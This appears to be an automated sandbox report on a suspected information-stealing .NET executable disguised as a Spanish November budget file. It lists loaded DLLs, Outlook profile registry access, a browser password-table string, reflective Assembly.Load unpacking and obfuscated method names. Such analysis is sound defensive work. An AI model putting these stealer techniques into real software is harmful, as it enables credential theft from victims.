Source: PRESUPUESTO DE NOVIEMBRE...exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: PRESUPUESTO DE NOVIEMBRE...exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.000000000339E000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.000000000338E000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.00000000033AC000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.00000000033DD000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: PRESUPUESTO DE NOVIEMBRE...exe

ReversingLabs: Detection: 44%

Source: unknown	Process created: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe "C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe"
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process created: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe "C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe"
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process created: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe "C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe"	Jump to behavior

Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: PRESUPUESTO DE NOVIEMBRE...exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: PRESUPUESTO DE NOVIEMBRE...exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: PRESUPUESTO DE NOVIEMBRE...exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: agpG.pdb source: PRESUPUESTO DE NOVIEMBRE...exe
Source:	Binary string: agpG.pdbSHA256 source: PRESUPUESTO DE NOVIEMBRE...exe

Data Obfuscation

.NET source code contains potential unpacker

Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.3f95ad0.0.raw.unpack, XlF5VlCIHRSQX8M5eh.cs	.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, hG1k6rSWR9qjxqoKi3.cs	.Net Code: CbaHO3vLtX System.Reflection.Assembly.Load(byte[])
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, hG1k6rSWR9qjxqoKi3.cs	.Net Code: CbaHO3vLtX System.Reflection.Assembly.Load(byte[])
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.77d0000.4.raw.unpack, XlF5VlCIHRSQX8M5eh.cs	.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, hG1k6rSWR9qjxqoKi3.cs	.Net Code: CbaHO3vLtX System.Reflection.Assembly.Load(byte[])

Source: PRESUPUESTO DE NOVIEMBRE...exe

Static PE information: section name: .text entropy: 7.689072386621162

Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, LDPRSJGgPioyLZLCT7.cs	High entropy of concatenated method names: 'xWvJ9XfMEW', 'QK0JiDJrv4', 'Y9MJ4aRfc2', 'HXp4LybpA8', 'Ttj4zFao43', 'BDfJqK7HiM', 'gV0JjJ3uwC', 'K8sJ7bOpvh', 'smPJFv38yZ', 'bHHJHBjjXx'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, uwtT01JgcZ4fKYmM8Q.cs	High entropy of concatenated method names: 'igwjJJ4CfA', 'GAcjIxaOe1', 'EwhjAhK9sN', 'wYCjloABjv', 'FX1jEFp4F5', 'gGDjGNHPqY', 'inbaQhK0S5JS5xdLtb', 'aci52l6h3b8miuF4lx', 'eZnjjiPw0O', 'jaBjFHHQ3V'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, AjLLXvPnxqDOKZj9sl.cs	High entropy of concatenated method names: 'xBuJ6mentO', 'Ge6JZ77eqY', 'GLsJOdGYEM', 'Ts2Jk3Q6Bo', 'o1rJaoDVtE', 'afJJoHqLET', 'iI4JWLAIUT', 'dObJeWHsPD', 'THnJgtMFGr', 'CREJMMe37E'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, BXlHBTaRVjup4cv1U4n.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'hBBDvC5cQQ', 'hCZDbINhse', 'e8JDSBx1WF', 'z3IDrEj6aF', 'WDbDnuJwng', 'biwDQqUToq', 'usLDT2Xxbg'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, jo15ypF8Q2d5FhhOFS.cs	High entropy of concatenated method names: 'zVM4230l31', 'DtQ4pDmSpd', 'GDD4Uon7pP', 'rgs4JD73jQ', 'SSc4I8D0Nn', 'LTEUnTPiOo', 'WGOUQFteqt', 'fK9UThpYIw', 'e5KU5hElWW', 'eAsUN6XIle'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, Kc46Hf8ITrxAA4lPXA.cs	High entropy of concatenated method names: 'Dispose', 'WYojNL3Kdj', 'O6S7hlJJZ4', 'm4QttvhWTl', 'UrNjLA24rN', 'O6rjzM5Pig', 'ProcessDialogKey', 'GRS7qclFlY', 'gXA7jQSNix', 'SSq77QVr9O'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, VGK4IuDs0UIkZWMV1c.cs	High entropy of concatenated method names: 'aW3x0stNrl', 'QGlxh8qMRY', 'gNFxR4Lw0H', 'ixnxCRawk0', 'JaWxvlpmnc', 'rAHxYdPryk', 'Next', 'Next', 'Next', 'NextBytes'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, rtay8k4GxqYUPWc6TA.cs	High entropy of concatenated method names: 'Autx9U4Bpu', 'tMKxp9aHLD', 'BBOxijKcVv', 'fCUxUpIh2u', 'n6Px4AbsYi', 'JOGxJa3Qck', 'HnpxIHYaYj', 'V6qxXbgbuM', 'tbBxAwUgh6', 'VlpxlZI9JL'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, jhecFsQYUfZHa1955Q.cs	High entropy of concatenated method names: 'DnPm5duM96', 'WOimLoBDsZ', 't3WxqOErIY', 'Sv2xjSGcwU', 'BeLmuMm3kG', 'Vj8myAsBxb', 'nGwmcFGqis', 'U27mvTkP3Y', 'tcMmblmJOj', 'YAVmScHGMw'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, v5FPWYwF5Lu3OYj8hh.cs	High entropy of concatenated method names: 'SUQpvMGCjC', 'FxCpbIUuiI', 'ASopStxVhh', 'YjYpr4Q1NU', 'FuLpngb8cP', 'O8WpQc6e4r', 't3KpTtd8nP', 'fbhp5XFQcR', 'sdapNHPmuB', 'H0ipLiOUyX'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, effcpNldddjUekj7Kr.cs	High entropy of concatenated method names: 'LC5Otrg9m', 'nLXkfJRnk', 'suQoC2II3', 'w0LW839uS', 'QBsgEQ2wh', 'lx0M4wFTi', 'UVuiLPeJMgZQHA1VZt', 'kvwHH8OSbt0P9X40Kd', 'owVBLHw3CbxtP7EuC7', 'c2NxdZNRA'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, lTjvuTj46f0WeeYZxc.cs	High entropy of concatenated method names: 'cPQfeqhjt1', 'nxZfgmioh1', 'oGGf0TKtDl', 'cV1fhvugv9', 'pHSfC83crn', 'GkwfYdTUBE', 'VPTf3q92eT', 'zSgfK85i6a', 'ROWfVLOOdU', 'E8lfu4RD3S'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, XJe3MayUM75Qt4S8HX.cs	High entropy of concatenated method names: 'ToString', 'eOPGu9PmYs', 'C17Ghdqg5W', 't2BGRYyULa', 'UdkGCMQ0CY', 'kxXGYlXM1U', 'TFgGPwSYUr', 'lA7G3Z59KS', 'FsfGK7MSOT', 'K2TGwCeV6L'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, r2gPona6djD4Y2Uy7Gs.cs	High entropy of concatenated method names: 'd0g86Nbmtr', 'QTW8ZO2eKo', 'bqI8O0r0fF', 'upl8kFUv31', 'UZD8akkjKf', 'Dwh8oZvvyn', 'yZ58WuGqnw', 'C9G8e1cyng', 'Gxv8gG59kQ', 'uuD8M7e27r'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, FbgDLHLo8mv2DHccjX.cs	High entropy of concatenated method names: 'YywikghXLJ', 'nJViomyTOn', 'CeEieCAXfD', 'AkvigR0YsY', 'fISiE8ISyP', 'xUxiGjVY4U', 'kh4imhdm7e', 'kiyixjkblp', 'Gy4i8fH3KM', 'mrpiDap3jL'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, nrl7IZhXFOrSCsYjvM.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'bUj7N18GqR', 'hnI7LStjV9', 'O2y7zVs7dm', 'WDwFq8ab3y', 'MfZFjL78er', 'G8CF7N34EY', 'MjXFFF6mq2', 'FPKLALjhPkTcp3uunQg'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, hG1k6rSWR9qjxqoKi3.cs	High entropy of concatenated method names: 'dwtF2fEfX8', 'rWKF9ccnYn', 'uEQFpQPssV', 'mwKFiwSbqB', 'epWFUwWIdb', 'qnAF41gs2Z', 'VR4FJ4sLhM', 'BO9FIDjXoj', 'GHUFXJ1MIg', 'q0JFA7wndr'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, HRGrkx7cr8Ehxg8ycc.cs	High entropy of concatenated method names: 'am38jtBrKN', 'HMy8FOPw6h', 'Y0B8HtKh9x', 'Kb089MnbSi', 'dyh8pAMZEi', 'H6w8UiFiSr', 'XoT8444lyq', 'L0HxTyOoYk', 'zZbx5KjFna', 'Sy3xN1l6gK'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, OZdrLdz96Gdlyr8xOp.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UTe8fZvjUi', 'F398Ew4dxD', 'QOo8G5MsNO', 'hFg8m4ryXr', 'goF8xcC0nA', 'NhP88yOqpx', 'SWT8DWxB0A'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, Exsot2flOn7wu6T8a3.cs	High entropy of concatenated method names: 'nUPUaq828h', 'GOoUWOpKVu', 'joliRtk93y', 'fqliCDx0Y9', 'OIJiY3apLX', 'WnniPD7rJe', 'lQ7i3467Ta', 'e3hiKxyMVf', 'Rswiw4UDuK', 'HowiVo0fhE'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, LDPRSJGgPioyLZLCT7.cs	High entropy of concatenated method names: 'xWvJ9XfMEW', 'QK0JiDJrv4', 'Y9MJ4aRfc2', 'HXp4LybpA8', 'Ttj4zFao43', 'BDfJqK7HiM', 'gV0JjJ3uwC', 'K8sJ7bOpvh', 'smPJFv38yZ', 'bHHJHBjjXx'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, uwtT01JgcZ4fKYmM8Q.cs	High entropy of concatenated method names: 'igwjJJ4CfA', 'GAcjIxaOe1', 'EwhjAhK9sN', 'wYCjloABjv', 'FX1jEFp4F5', 'gGDjGNHPqY', 'inbaQhK0S5JS5xdLtb', 'aci52l6h3b8miuF4lx', 'eZnjjiPw0O', 'jaBjFHHQ3V'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, AjLLXvPnxqDOKZj9sl.cs	High entropy of concatenated method names: 'xBuJ6mentO', 'Ge6JZ77eqY', 'GLsJOdGYEM', 'Ts2Jk3Q6Bo', 'o1rJaoDVtE', 'afJJoHqLET', 'iI4JWLAIUT', 'dObJeWHsPD', 'THnJgtMFGr', 'CREJMMe37E'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, BXlHBTaRVjup4cv1U4n.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'hBBDvC5cQQ', 'hCZDbINhse', 'e8JDSBx1WF', 'z3IDrEj6aF', 'WDbDnuJwng', 'biwDQqUToq', 'usLDT2Xxbg'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, jo15ypF8Q2d5FhhOFS.cs	High entropy of concatenated method names: 'zVM4230l31', 'DtQ4pDmSpd', 'GDD4Uon7pP', 'rgs4JD73jQ', 'SSc4I8D0Nn', 'LTEUnTPiOo', 'WGOUQFteqt', 'fK9UThpYIw', 'e5KU5hElWW', 'eAsUN6XIle'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, Kc46Hf8ITrxAA4lPXA.cs	High entropy of concatenated method names: 'Dispose', 'WYojNL3Kdj', 'O6S7hlJJZ4', 'm4QttvhWTl', 'UrNjLA24rN', 'O6rjzM5Pig', 'ProcessDialogKey', 'GRS7qclFlY', 'gXA7jQSNix', 'SSq77QVr9O'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, VGK4IuDs0UIkZWMV1c.cs	High entropy of concatenated method names: 'aW3x0stNrl', 'QGlxh8qMRY', 'gNFxR4Lw0H', 'ixnxCRawk0', 'JaWxvlpmnc', 'rAHxYdPryk', 'Next', 'Next', 'Next', 'NextBytes'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, rtay8k4GxqYUPWc6TA.cs	High entropy of concatenated method names: 'Autx9U4Bpu', 'tMKxp9aHLD', 'BBOxijKcVv', 'fCUxUpIh2u', 'n6Px4AbsYi', 'JOGxJa3Qck', 'HnpxIHYaYj', 'V6qxXbgbuM', 'tbBxAwUgh6', 'VlpxlZI9JL'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, jhecFsQYUfZHa1955Q.cs	High entropy of concatenated method names: 'DnPm5duM96', 'WOimLoBDsZ', 't3WxqOErIY', 'Sv2xjSGcwU', 'BeLmuMm3kG', 'Vj8myAsBxb', 'nGwmcFGqis', 'U27mvTkP3Y', 'tcMmblmJOj', 'YAVmScHGMw'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, v5FPWYwF5Lu3OYj8hh.cs	High entropy of concatenated method names: 'SUQpvMGCjC', 'FxCpbIUuiI', 'ASopStxVhh', 'YjYpr4Q1NU', 'FuLpngb8cP', 'O8WpQc6e4r', 't3KpTtd8nP', 'fbhp5XFQcR', 'sdapNHPmuB', 'H0ipLiOUyX'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, effcpNldddjUekj7Kr.cs	High entropy of concatenated method names: 'LC5Otrg9m', 'nLXkfJRnk', 'suQoC2II3', 'w0LW839uS', 'QBsgEQ2wh', 'lx0M4wFTi', 'UVuiLPeJMgZQHA1VZt', 'kvwHH8OSbt0P9X40Kd', 'owVBLHw3CbxtP7EuC7', 'c2NxdZNRA'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, lTjvuTj46f0WeeYZxc.cs	High entropy of concatenated method names: 'cPQfeqhjt1', 'nxZfgmioh1', 'oGGf0TKtDl', 'cV1fhvugv9', 'pHSfC83crn', 'GkwfYdTUBE', 'VPTf3q92eT', 'zSgfK85i6a', 'ROWfVLOOdU', 'E8lfu4RD3S'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, XJe3MayUM75Qt4S8HX.cs	High entropy of concatenated method names: 'ToString', 'eOPGu9PmYs', 'C17Ghdqg5W', 't2BGRYyULa', 'UdkGCMQ0CY', 'kxXGYlXM1U', 'TFgGPwSYUr', 'lA7G3Z59KS', 'FsfGK7MSOT', 'K2TGwCeV6L'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, r2gPona6djD4Y2Uy7Gs.cs	High entropy of concatenated method names: 'd0g86Nbmtr', 'QTW8ZO2eKo', 'bqI8O0r0fF', 'upl8kFUv31', 'UZD8akkjKf', 'Dwh8oZvvyn', 'yZ58WuGqnw', 'C9G8e1cyng', 'Gxv8gG59kQ', 'uuD8M7e27r'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, FbgDLHLo8mv2DHccjX.cs	High entropy of concatenated method names: 'YywikghXLJ', 'nJViomyTOn', 'CeEieCAXfD', 'AkvigR0YsY', 'fISiE8ISyP', 'xUxiGjVY4U', 'kh4imhdm7e', 'kiyixjkblp', 'Gy4i8fH3KM', 'mrpiDap3jL'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, nrl7IZhXFOrSCsYjvM.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'bUj7N18GqR', 'hnI7LStjV9', 'O2y7zVs7dm', 'WDwFq8ab3y', 'MfZFjL78er', 'G8CF7N34EY', 'MjXFFF6mq2', 'FPKLALjhPkTcp3uunQg'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, hG1k6rSWR9qjxqoKi3.cs	High entropy of concatenated method names: 'dwtF2fEfX8', 'rWKF9ccnYn', 'uEQFpQPssV', 'mwKFiwSbqB', 'epWFUwWIdb', 'qnAF41gs2Z', 'VR4FJ4sLhM', 'BO9FIDjXoj', 'GHUFXJ1MIg', 'q0JFA7wndr'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, HRGrkx7cr8Ehxg8ycc.cs	High entropy of concatenated method names: 'am38jtBrKN', 'HMy8FOPw6h', 'Y0B8HtKh9x', 'Kb089MnbSi', 'dyh8pAMZEi', 'H6w8UiFiSr', 'XoT8444lyq', 'L0HxTyOoYk', 'zZbx5KjFna', 'Sy3xN1l6gK'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, OZdrLdz96Gdlyr8xOp.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UTe8fZvjUi', 'F398Ew4dxD', 'QOo8G5MsNO', 'hFg8m4ryXr', 'goF8xcC0nA', 'NhP88yOqpx', 'SWT8DWxB0A'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, Exsot2flOn7wu6T8a3.cs	High entropy of concatenated method names: 'nUPUaq828h', 'GOoUWOpKVu', 'joliRtk93y', 'fqliCDx0Y9', 'OIJiY3apLX', 'WnniPD7rJe', 'lQ7i3467Ta', 'e3hiKxyMVf', 'Rswiw4UDuK', 'HowiVo0fhE'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, LDPRSJGgPioyLZLCT7.cs	High entropy of concatenated method names: 'xWvJ9XfMEW', 'QK0JiDJrv4', 'Y9MJ4aRfc2', 'HXp4LybpA8', 'Ttj4zFao43', 'BDfJqK7HiM', 'gV0JjJ3uwC', 'K8sJ7bOpvh', 'smPJFv38yZ', 'bHHJHBjjXx'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, uwtT01JgcZ4fKYmM8Q.cs	High entropy of concatenated method names: 'igwjJJ4CfA', 'GAcjIxaOe1', 'EwhjAhK9sN', 'wYCjloABjv', 'FX1jEFp4F5', 'gGDjGNHPqY', 'inbaQhK0S5JS5xdLtb', 'aci52l6h3b8miuF4lx', 'eZnjjiPw0O', 'jaBjFHHQ3V'
